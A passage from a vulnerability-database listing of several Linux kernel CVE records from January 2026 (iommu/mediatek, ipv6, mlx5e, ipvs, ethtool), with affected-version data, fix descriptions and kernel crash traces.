Affected: 26593928564cf5b576ff05d3cbd958f57c9534bb , < 5c04217d06a1161aaf36267e9d971ab6f847d5a7 (git) Affected: 26593928564cf5b576ff05d3cbd958f57c9534bb , < 1ef70a0b104ae8011811f60bcfaa55ff49385171 (git) Affected: 26593928564cf5b576ff05d3cbd958f57c9534bb , < f6c08d3aa441bbc1956e9d65f1cbb89113a5aa8a (git) Affected: 26593928564cf5b576ff05d3cbd958f57c9534bb , < de83d4617f9fe059623e97acf7e1e10d209625b5 (git) Affected: 51080de72e26771f0ed9d44982974279ccbc92b8 (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/iommu/mtk_iommu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "896ec55da3b90bdb9fc04fedc17ad8c359b2eee5",
"status": "affected",
"version": "8412e5dd24ffc8bc21a00bfaa0b80d4596cdc9da",
"versionType": "git"
},
{
"lessThan": "5c04217d06a1161aaf36267e9d971ab6f847d5a7",
"status": "affected",
"version": "26593928564cf5b576ff05d3cbd958f57c9534bb",
"versionType": "git"
},
{
"lessThan": "1ef70a0b104ae8011811f60bcfaa55ff49385171",
"status": "affected",
"version": "26593928564cf5b576ff05d3cbd958f57c9534bb",
"versionType": "git"
},
{
"lessThan": "f6c08d3aa441bbc1956e9d65f1cbb89113a5aa8a",
"status": "affected",
"version": "26593928564cf5b576ff05d3cbd958f57c9534bb",
"versionType": "git"
},
{
"lessThan": "de83d4617f9fe059623e97acf7e1e10d209625b5",
"status": "affected",
"version": "26593928564cf5b576ff05d3cbd958f57c9534bb",
"versionType": "git"
},
{
"status": "affected",
"version": "51080de72e26771f0ed9d44982974279ccbc92b8",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/iommu/mtk_iommu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.2"
},
{
"lessThan": "6.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "6.1.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.0.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu/mediatek: fix use-after-free on probe deferral\n\nThe driver is dropping the references taken to the larb devices during\nprobe after successful lookup as well as on errors. This can\npotentially lead to a use-after-free in case a larb device has not yet\nbeen bound to its driver so that the iommu driver probe defers.\n\nFix this by keeping the references as expected while the iommu driver is\nbound."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:31:25.400Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/896ec55da3b90bdb9fc04fedc17ad8c359b2eee5"
},
{
"url": "https://git.kernel.org/stable/c/5c04217d06a1161aaf36267e9d971ab6f847d5a7"
},
{
"url": "https://git.kernel.org/stable/c/1ef70a0b104ae8011811f60bcfaa55ff49385171"
},
{
"url": "https://git.kernel.org/stable/c/f6c08d3aa441bbc1956e9d65f1cbb89113a5aa8a"
},
{
"url": "https://git.kernel.org/stable/c/de83d4617f9fe059623e97acf7e1e10d209625b5"
}
],
"title": "iommu/mediatek: fix use-after-free on probe deferral",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71071",
"datePublished": "2026-01-13T15:31:25.400Z",
"dateReserved": "2026-01-13T15:30:19.647Z",
"dateUpdated": "2026-01-13T15:31:25.400Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71080 (GCVE-0-2025-71080)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-13 15:34
VLAI?
EPSS
Title
ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT
On PREEMPT_RT kernels, after rt6_get_pcpu_route() returns NULL, the
current task can be preempted. Another task running on the same CPU
may then execute rt6_make_pcpu_route() and successfully install a
pcpu_rt entry. When the first task resumes execution, its cmpxchg()
in rt6_make_pcpu_route() will fail because rt6i_pcpu is no longer
NULL, triggering the BUG_ON(prev). It's easy to reproduce it by adding
mdelay() after rt6_get_pcpu_route().
Using preempt_disable/enable is not appropriate here because
ip6_rt_pcpu_alloc() may sleep.
Fix this by handling the cmpxchg() failure gracefully on PREEMPT_RT:
free our allocation and return the existing pcpu_rt installed by
another task. The BUG_ON is replaced by WARN_ON_ONCE for non-PREEMPT_RT
kernels where such races should not occur.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
d2d6422f8bd17c6bb205133e290625a564194496 , < 1dc33ad0867325f8d2c6d7b2a6f542d4f3121f66
(git)
Affected: d2d6422f8bd17c6bb205133e290625a564194496 , < 787515ccb2292f82eb0876993129154629a49651 (git) Affected: d2d6422f8bd17c6bb205133e290625a564194496 , < 1adaea51c61b52e24e7ab38f7d3eba023b2d050d (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/route.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1dc33ad0867325f8d2c6d7b2a6f542d4f3121f66",
"status": "affected",
"version": "d2d6422f8bd17c6bb205133e290625a564194496",
"versionType": "git"
},
{
"lessThan": "787515ccb2292f82eb0876993129154629a49651",
"status": "affected",
"version": "d2d6422f8bd17c6bb205133e290625a564194496",
"versionType": "git"
},
{
"lessThan": "1adaea51c61b52e24e7ab38f7d3eba023b2d050d",
"status": "affected",
"version": "d2d6422f8bd17c6bb205133e290625a564194496",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv6/route.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.12"
},
{
"lessThan": "6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT\n\nOn PREEMPT_RT kernels, after rt6_get_pcpu_route() returns NULL, the\ncurrent task can be preempted. Another task running on the same CPU\nmay then execute rt6_make_pcpu_route() and successfully install a\npcpu_rt entry. When the first task resumes execution, its cmpxchg()\nin rt6_make_pcpu_route() will fail because rt6i_pcpu is no longer\nNULL, triggering the BUG_ON(prev). It\u0027s easy to reproduce it by adding\nmdelay() after rt6_get_pcpu_route().\n\nUsing preempt_disable/enable is not appropriate here because\nip6_rt_pcpu_alloc() may sleep.\n\nFix this by handling the cmpxchg() failure gracefully on PREEMPT_RT:\nfree our allocation and return the existing pcpu_rt installed by\nanother task. The BUG_ON is replaced by WARN_ON_ONCE for non-PREEMPT_RT\nkernels where such races should not occur."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:34:44.832Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1dc33ad0867325f8d2c6d7b2a6f542d4f3121f66"
},
{
"url": "https://git.kernel.org/stable/c/787515ccb2292f82eb0876993129154629a49651"
},
{
"url": "https://git.kernel.org/stable/c/1adaea51c61b52e24e7ab38f7d3eba023b2d050d"
}
],
"title": "ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71080",
"datePublished": "2026-01-13T15:34:44.832Z",
"dateReserved": "2026-01-13T15:30:19.648Z",
"dateUpdated": "2026-01-13T15:34:44.832Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68779 (GCVE-0-2025-68779)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-13 15:28
VLAI?
EPSS
Title
net/mlx5e: Avoid unregistering PSP twice
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/mlx5e: Avoid unregistering PSP twice
PSP is unregistered twice in:
_mlx5e_remove -> mlx5e_psp_unregister
mlx5e_nic_cleanup -> mlx5e_psp_unregister
This leads to a refcount underflow in some conditions:
------------[ cut here ]------------
refcount_t: underflow; use-after-free.
WARNING: CPU: 2 PID: 1694 at lib/refcount.c:28 refcount_warn_saturate+0xd8/0xe0
[...]
mlx5e_psp_unregister+0x26/0x50 [mlx5_core]
mlx5e_nic_cleanup+0x26/0x90 [mlx5_core]
mlx5e_remove+0xe6/0x1f0 [mlx5_core]
auxiliary_bus_remove+0x18/0x30
device_release_driver_internal+0x194/0x1f0
bus_remove_device+0xc6/0x130
device_del+0x159/0x3c0
mlx5_rescan_drivers_locked+0xbc/0x2a0 [mlx5_core]
[...]
Do not directly remove psp from the _mlx5e_remove path, the PSP cleanup
happens as part of profile cleanup.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/en_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e12c912f92ccea671b514caf371f28485714bb4b",
"status": "affected",
"version": "89ee2d92f66c45625ff1c173df2dbdea32568c5d",
"versionType": "git"
},
{
"lessThan": "35e93736f69963337912594eb3951ab320b77521",
"status": "affected",
"version": "89ee2d92f66c45625ff1c173df2dbdea32568c5d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/en_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.18"
},
{
"lessThan": "6.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Avoid unregistering PSP twice\n\nPSP is unregistered twice in:\n_mlx5e_remove -\u003e mlx5e_psp_unregister\nmlx5e_nic_cleanup -\u003e mlx5e_psp_unregister\n\nThis leads to a refcount underflow in some conditions:\n------------[ cut here ]------------\nrefcount_t: underflow; use-after-free.\nWARNING: CPU: 2 PID: 1694 at lib/refcount.c:28 refcount_warn_saturate+0xd8/0xe0\n[...]\n mlx5e_psp_unregister+0x26/0x50 [mlx5_core]\n mlx5e_nic_cleanup+0x26/0x90 [mlx5_core]\n mlx5e_remove+0xe6/0x1f0 [mlx5_core]\n auxiliary_bus_remove+0x18/0x30\n device_release_driver_internal+0x194/0x1f0\n bus_remove_device+0xc6/0x130\n device_del+0x159/0x3c0\n mlx5_rescan_drivers_locked+0xbc/0x2a0 [mlx5_core]\n[...]\n\nDo not directly remove psp from the _mlx5e_remove path, the PSP cleanup\nhappens as part of profile cleanup."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:28:54.795Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e12c912f92ccea671b514caf371f28485714bb4b"
},
{
"url": "https://git.kernel.org/stable/c/35e93736f69963337912594eb3951ab320b77521"
}
],
"title": "net/mlx5e: Avoid unregistering PSP twice",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68779",
"datePublished": "2026-01-13T15:28:54.795Z",
"dateReserved": "2025-12-24T10:30:51.036Z",
"dateUpdated": "2026-01-13T15:28:54.795Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68813 (GCVE-0-2025-68813)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
ipvs: fix ipv4 null-ptr-deref in route error path
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipvs: fix ipv4 null-ptr-deref in route error path
The IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()
without ensuring skb->dev is set, leading to a NULL pointer dereference
in fib_compute_spec_dst() when ipv4_link_failure() attempts to send
ICMP destination unreachable messages.
The issue emerged after commit ed0de45a1008 ("ipv4: recompile ip options
in ipv4_link_failure") started calling __ip_options_compile() from
ipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()
which dereferences skb->dev. An attempt was made to fix the NULL skb->dev
dereference in commit 0113d9c9d1cc ("ipv4: fix null-deref in
ipv4_link_failure"), but it only addressed the immediate dev_net(skb->dev)
dereference by using a fallback device. The fix was incomplete because
fib_compute_spec_dst() later in the call chain still accesses skb->dev
directly, which remains NULL when IPVS calls dst_link_failure().
The crash occurs when:
1. IPVS processes a packet in NAT mode with a misconfigured destination
2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route
3. The error path calls dst_link_failure(skb) with skb->dev == NULL
4. ipv4_link_failure() → ipv4_send_dest_unreach() →
__ip_options_compile() → fib_compute_spec_dst()
5. fib_compute_spec_dst() dereferences NULL skb->dev
Apply the same fix used for IPv6 in commit 326bf17ea5d4 ("ipvs: fix
ipv6 route unreach panic"): set skb->dev from skb_dst(skb)->dev before
calling dst_link_failure().
KASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]
CPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2
RIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233
RIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285
Call Trace:
<TASK>
spec_dst_fill net/ipv4/ip_options.c:232
spec_dst_fill net/ipv4/ip_options.c:229
__ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330
ipv4_send_dest_unreach net/ipv4/route.c:1252
ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265
dst_link_failure include/net/dst.h:437
__ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412
ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
ed0de45a1008991fdaa27a0152befcb74d126a8b , < dd72a93c80408f06327dd2d956eb1a656d0b5903
(git)
Affected: ed0de45a1008991fdaa27a0152befcb74d126a8b , < 312d7cd88882fc6cadcc08b02287497aaaf94bcd (git) Affected: ed0de45a1008991fdaa27a0152befcb74d126a8b , < cdeff10851c37a002d87a035818ebd60fdb74447 (git) Affected: ed0de45a1008991fdaa27a0152befcb74d126a8b , < 4729ff0581fbb7ad098b6153b76b6f5aac94618a (git) Affected: ed0de45a1008991fdaa27a0152befcb74d126a8b , < 25ab24df31f7af843c96a38e0781b9165216e1a8 (git) Affected: ed0de45a1008991fdaa27a0152befcb74d126a8b , < 689a627d14788ad772e0fa24c2e57a23dbc7ce90 (git) Affected: ed0de45a1008991fdaa27a0152befcb74d126a8b , < ad891bb3d079a46a821bf2b8867854645191bab0 (git) Affected: 6c2fa855d8178699706b1192db2f1f8102b0ba1e (git) Affected: fbf569d2beee2a4a7a0bc8b619c26101d1211a88 (git) Affected: ff71f99d5fb2daf54340e8b290d0bc4e6b4c1d38 (git) Affected: 3d988fcddbe7b8673a231958bd2fba61b5a7ced9 (git) Affected: 8a430e56a6485267a1b2d3747209d26c54d1a34b (git) Affected: 6bd1ee0a993fc9574ae43c1994c54a60cb23a380 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/ipvs/ip_vs_xmit.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "dd72a93c80408f06327dd2d956eb1a656d0b5903",
"status": "affected",
"version": "ed0de45a1008991fdaa27a0152befcb74d126a8b",
"versionType": "git"
},
{
"lessThan": "312d7cd88882fc6cadcc08b02287497aaaf94bcd",
"status": "affected",
"version": "ed0de45a1008991fdaa27a0152befcb74d126a8b",
"versionType": "git"
},
{
"lessThan": "cdeff10851c37a002d87a035818ebd60fdb74447",
"status": "affected",
"version": "ed0de45a1008991fdaa27a0152befcb74d126a8b",
"versionType": "git"
},
{
"lessThan": "4729ff0581fbb7ad098b6153b76b6f5aac94618a",
"status": "affected",
"version": "ed0de45a1008991fdaa27a0152befcb74d126a8b",
"versionType": "git"
},
{
"lessThan": "25ab24df31f7af843c96a38e0781b9165216e1a8",
"status": "affected",
"version": "ed0de45a1008991fdaa27a0152befcb74d126a8b",
"versionType": "git"
},
{
"lessThan": "689a627d14788ad772e0fa24c2e57a23dbc7ce90",
"status": "affected",
"version": "ed0de45a1008991fdaa27a0152befcb74d126a8b",
"versionType": "git"
},
{
"lessThan": "ad891bb3d079a46a821bf2b8867854645191bab0",
"status": "affected",
"version": "ed0de45a1008991fdaa27a0152befcb74d126a8b",
"versionType": "git"
},
{
"status": "affected",
"version": "6c2fa855d8178699706b1192db2f1f8102b0ba1e",
"versionType": "git"
},
{
"status": "affected",
"version": "fbf569d2beee2a4a7a0bc8b619c26101d1211a88",
"versionType": "git"
},
{
"status": "affected",
"version": "ff71f99d5fb2daf54340e8b290d0bc4e6b4c1d38",
"versionType": "git"
},
{
"status": "affected",
"version": "3d988fcddbe7b8673a231958bd2fba61b5a7ced9",
"versionType": "git"
},
{
"status": "affected",
"version": "8a430e56a6485267a1b2d3747209d26c54d1a34b",
"versionType": "git"
},
{
"status": "affected",
"version": "6bd1ee0a993fc9574ae43c1994c54a60cb23a380",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/ipvs/ip_vs_xmit.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.18.139",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.4.179",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.9.171",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.114",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.19.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() \u2192 ipv4_send_dest_unreach() \u2192\n __ip_options_compile() \u2192 fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:17.898Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/dd72a93c80408f06327dd2d956eb1a656d0b5903"
},
{
"url": "https://git.kernel.org/stable/c/312d7cd88882fc6cadcc08b02287497aaaf94bcd"
},
{
"url": "https://git.kernel.org/stable/c/cdeff10851c37a002d87a035818ebd60fdb74447"
},
{
"url": "https://git.kernel.org/stable/c/4729ff0581fbb7ad098b6153b76b6f5aac94618a"
},
{
"url": "https://git.kernel.org/stable/c/25ab24df31f7af843c96a38e0781b9165216e1a8"
},
{
"url": "https://git.kernel.org/stable/c/689a627d14788ad772e0fa24c2e57a23dbc7ce90"
},
{
"url": "https://git.kernel.org/stable/c/ad891bb3d079a46a821bf2b8867854645191bab0"
}
],
"title": "ipvs: fix ipv4 null-ptr-deref in route error path",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68813",
"datePublished": "2026-01-13T15:29:18.483Z",
"dateReserved": "2025-12-24T10:30:51.047Z",
"dateUpdated": "2026-01-19T12:19:17.898Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68795 (GCVE-0-2025-68795)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
ethtool: Avoid overflowing userspace buffer on stats query
Summary
In the Linux kernel, the following vulnerability has been resolved:
ethtool: Avoid overflowing userspace buffer on stats query
The ethtool -S command operates across three ioctl calls:
